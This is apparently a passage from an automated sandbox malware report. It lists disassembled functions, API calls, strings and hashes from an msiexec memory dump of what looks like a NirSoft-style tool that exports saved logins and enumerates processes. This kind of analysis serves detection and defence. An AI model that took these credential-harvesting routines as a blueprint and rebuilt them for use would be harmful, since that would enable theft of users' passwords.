                                                              • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                              • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                              Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DBCD
                                                              • memset.MSVCRT ref: 0040DBE9
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                              • API String ID: 3330709923-517860148
                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                              Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040806A
                                                              • memset.MSVCRT ref: 0040807F
                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                              • memset.MSVCRT ref: 004081E4
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                              • String ID: logins$null
                                                              • API String ID: 2148543256-2163367763
                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                              Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • memset.MSVCRT ref: 004085CF
                                                              • memset.MSVCRT ref: 004085F1
                                                              • memset.MSVCRT ref: 00408606
                                                              • strcmp.MSVCRT ref: 00408645
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                              • memset.MSVCRT ref: 0040870E
                                                              • strcmp.MSVCRT ref: 0040876B
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                              • String ID: ---
                                                              • API String ID: 3437578500-2854292027
                                                              • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                              • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                              Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041087D
                                                              • memset.MSVCRT ref: 00410892
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                              • String ID:
                                                              • API String ID: 1010922700-0
                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                              Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                              • malloc.MSVCRT ref: 004186B7
                                                              • free.MSVCRT ref: 004186C7
                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                              • free.MSVCRT ref: 004186E0
                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                              • malloc.MSVCRT ref: 004186FE
                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                              • free.MSVCRT ref: 00418716
                                                              • free.MSVCRT ref: 0041872A
                                                              • free.MSVCRT ref: 00418749
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: free$FullNamePath$malloc$Version
                                                              • String ID: |A
                                                              • API String ID: 3356672799-1717621600
                                                              • Opcode ID: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                              • Opcode Fuzzy Hash: cf4da308e8b77386535cb07368452b59c4a465ddf093543d96db502a43b7ae5e
                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                              Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                              • API String ID: 2081463915-1959339147
                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                              Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                              • API String ID: 2012295524-70141382
                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                              Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule
                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                              • API String ID: 667068680-3953557276
                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                              Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                              • String ID:
                                                              • API String ID: 1700100422-0
                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                              Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                              • String ID:
                                                              • API String ID: 552707033-0
                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                              Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: %%0.%df
                                                              • API String ID: 3473751417-763548558
                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                              Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                              • GetParent.USER32(?), ref: 00406136
                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                              • String ID: A
                                                              • API String ID: 2892645895-3554254475
                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                              Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                              • memset.MSVCRT ref: 0040DA23
                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                              • String ID: caption
                                                              • API String ID: 973020956-4135340389
                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                              Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf$wcscpy
                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                              • API String ID: 1283228442-2366825230
                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                              Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00413972
                                                              • wcscpy.MSVCRT ref: 00413982
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                              • wcscpy.MSVCRT ref: 004139D1
                                                              • wcscat.MSVCRT ref: 004139DC
                                                              • memset.MSVCRT ref: 004139B8
                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                              • memset.MSVCRT ref: 00413A00
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                              • wcscat.MSVCRT ref: 00413A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
